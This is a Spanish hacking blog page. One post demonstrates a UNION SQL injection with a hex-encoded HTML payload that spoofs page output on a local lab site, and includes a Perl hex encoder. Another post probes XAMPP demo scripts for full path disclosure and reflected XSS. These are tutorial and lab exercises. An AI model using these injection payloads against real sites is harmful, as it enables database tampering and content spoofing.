KozmiC`s Blog

Publicado el 26/07/2010 12:07:00 en Seguridad.

SQL Injection + Cross Site Scripting = Fake

Bueno vuelvo con un nuevo aporte sobre un "video-demostración" de Xzite sobre SQLi+XSS.
Estube dandole vueltas al tema y me di cuenta que se puede manipular infomación de cierto modo,al tener una base de datos,un error en la base de datos y un script en php que saque de un "tutorial" o "demostración" de ka0x.

http://192.168.1.2/vuln/SQLi/users.php?id=1+and+1=2+union+select+1,2,3,4--

----------------------------
MySQL Injection TEST
D.O.M LABS

user_id: 1
username: 2
country: 4
----------------------------

Entones podemos leer el código fuente y copiar cierta parte para "imitar" el resulado.

<h2><center><u>MySQL Injection TEST<br>D.O.M LABS</u><br><br><font color='#FF0000'>user_id: </font>1<br><font color='#FF0000'>username: </font>2<br><font color='#FF0000'>country: </font>4<br>

Ahora toca ir modificando los resultados para nuestro favor,pero hay que tomar encuenta que los números que imprime es el 1,2 y 4.
Yo voy a imitar el código fuente desde el número 1,al final de la imitación colocare la etiqueta "<script>" para que oculte lo siguiente del código,asi parece un comentario.

666<br><font color='#FF0000'>username: </font>Diablo<br><font color='#FF0000'>country: </font>Hell<br><script>

Si ya han visto el video de Xzite,sabran que para pasar el código html "faked" deben pasarlo a hexagesimal y ante de imprimirlo en el link poner al principio "0x",sin comillas claro.

http://192.168.1.2/vuln/SQLi/users.php?id=1+and+1=2+union+select+0x3636363C62723E3C666F6E7420636F6C6F723D2723464630303030273E757365726E616D653A203C2F666F6E743E446961626C6F3C62723E3C666F6E7420636F6C6F723D2723464630303030273E636F756E7472793A203C2F666F6E743E48656C6C3C62723E3C7363726970743E,2,3,4--

Y les imprimiria:

----------------------------
MySQL Injection TEST
D.O.M LABS

user_id: 666
username: Diablo
country: Hell
----------------------------

Y bueno para la gente que le deje "paja" entrar en la consola,mysql ..etc
Les dejo un script bastante básico de conversión:

hex.pl
----------------------------
print "Enter string to encode:";
$str=<STDIN>;chomp $str;
$enc = encode($str); print "Hex Encoded value: 0x$enc\n";
sub encode{ #Sub to encode
@subvar=@_;
my $sqlstr =$subvar[0];
@ASCII = unpack("C*", $sqlstr);
foreach $line (@ASCII) {
$encoded = sprintf('%lx',$line);
$encoded_command .= $encoded;
}
return $encoded_command;
}
----------------------------

Bueno aqui finaliza mi "documentación" sobre SQL Injection y Cross Site Scripting dando a lugar un bonito fake,xploit o como deseen denominarlo.

Agradesco a ... [/trombi]

Continúa aquí...

Comentarios: 0 | Leer comentarios

Publicado el 26/07/2010 12:07:00 en Seguridad.

XAMPP for Linux

También conocido por LAMPP:

Linux Apache MySQL PHP Python/Perl

Los que no conoscan este "Pack",es muy similar a AppServ,EasyPHP y otros.
Después de haber leido un artículo en el blog de Murder,decidi analizar detenidamente algunos archivos del XAMPP||LAMPP,para obtener más errores de programación y ayudar a los que utilizen este "sistema" de web.

Dejo el link del Pack ,una vez descargado lo instalan en la carpeta que deseen,yo por ejemplo la tengo en la carpeta "/opt".

http://www.apachefriends.org/download.php?xampp-linux-1.7.3a.tar.gz

Instalando:

sudo tar xvfz xampp-linux-1.7.3a.tar.gz -C /opt

Este proceso puede tardar un poco,lo que sucede es que el archivo se extrae en la carpeta especificada,en este caso "/opt".

Y para iniciar el "sistema" de web,debemos introducir el siguiente comando en la consola:

/opt/lampp/lampp start

En el caso que estemos en la carpeta lampp:

./lampp start

Los anteriores comandos hay que introducirlos siendos un usuario con privilegios de root o con el comando "sudo" delante o "su -" .

Puede estar contentos de tener ya su propio servidor web,pero ¿Es seguro?

Primer error encontrado: http://localhost/xampp/biorhythm.php


Un demo-script de PHP+GD.
Observe que habia un formulario entonces decidi directamente pulsar "OK",y mi resultado fue un simple "FPD",gracias a el grande de l0ve conosco esta vulnerabilidad.

Siento apartarme un momento del documento pero recomiendo sinceramente el artículo que tiene l0ve sobre "Full Path Disclosure".

Un simple error,me daba bastante información para un futuro ataque.

Warning: checkdate() expects parameter 1 to be long, string given in /opt/lampp/htdocs/xampp/biorhythm.php on line 105

Como se puede mirar en el error me da la raiz donde esa intalado el XAMPP.

Tambien podemos provocar un error dejando corchetes abierto,me refiero a que el array no tendria valor.

http://localhost/xampp/biorhythm.php?birthdate[]=

Segundo error encontrado: http://localhost/xampp/iart.php

Otro demo-script de PHP+GD+FreeType.
Siempre que veo un formulario donde se pueda ingresar texto,veo un XSS,SQLi e incluso RFI o LFI.

Pueden tomarme como un loco,pero las posibilidades de que encuentre un RFI o LFI en un formulario parecen nulas pero las hay,el ser humano es uno de los animales que tiene la gran "habilidad" de equivocarse mucho.

Volviendo al tema decidi hacer una comprobación de SQLi,y ese intento fue fallido no se toca ningun base de datos y bueno decidí probar un XSS,injecte un código simple HTML:

<h1>TEST-XSS</h1>

Nada,valla pero no voy a abandonar,probemos rompiendo el orden del código fuente si es que se puede decir asi.

"><h1>TEST-XSS</h1>

Bien,mis posibilidades de haber e... [/trombi]

Continúa aquí...

Comentarios: 0 | Leer comentarios

Publicado el 22/06/2010 12:06:00 en Off Topic.

Despues de un tiempo de reflexion,decidi no huir de mis miedos y afrontarlos y ahora es cuando los señores del gobierno deben tener en cuenta que no voy a ser un enemigo,pero tampoco un aliado.

Espero contribuir en todo lo que pueda en dios de la red y espero que Xzite no tenga más discusiones por que con problemas y peleas no se soluciona nada,ahora no hablo como un informático,si no como un amigo de la red.

Atentamente. KozmiC.

Comentarios: 0 | Leer comentarios

Publicado el 08/02/2010 12:02:00 en Programación General.

Aqui dejo una parte de mi tutorial de Batch Injection,Que lo disfruten.

http://www.megaupload.com/?d=9SES8HFK

Comentarios: 3 | Leer comentarios

Publicado el 27/01/2010 12:01:00 en Diseño Gráfico.

Bueno esta es mi ultima creacion del GIMP, no se muy buena pero comprendan que estoy empezando a utilizarlo.


Comentarios: 2 | Leer comentarios

Ver: Siguientes 5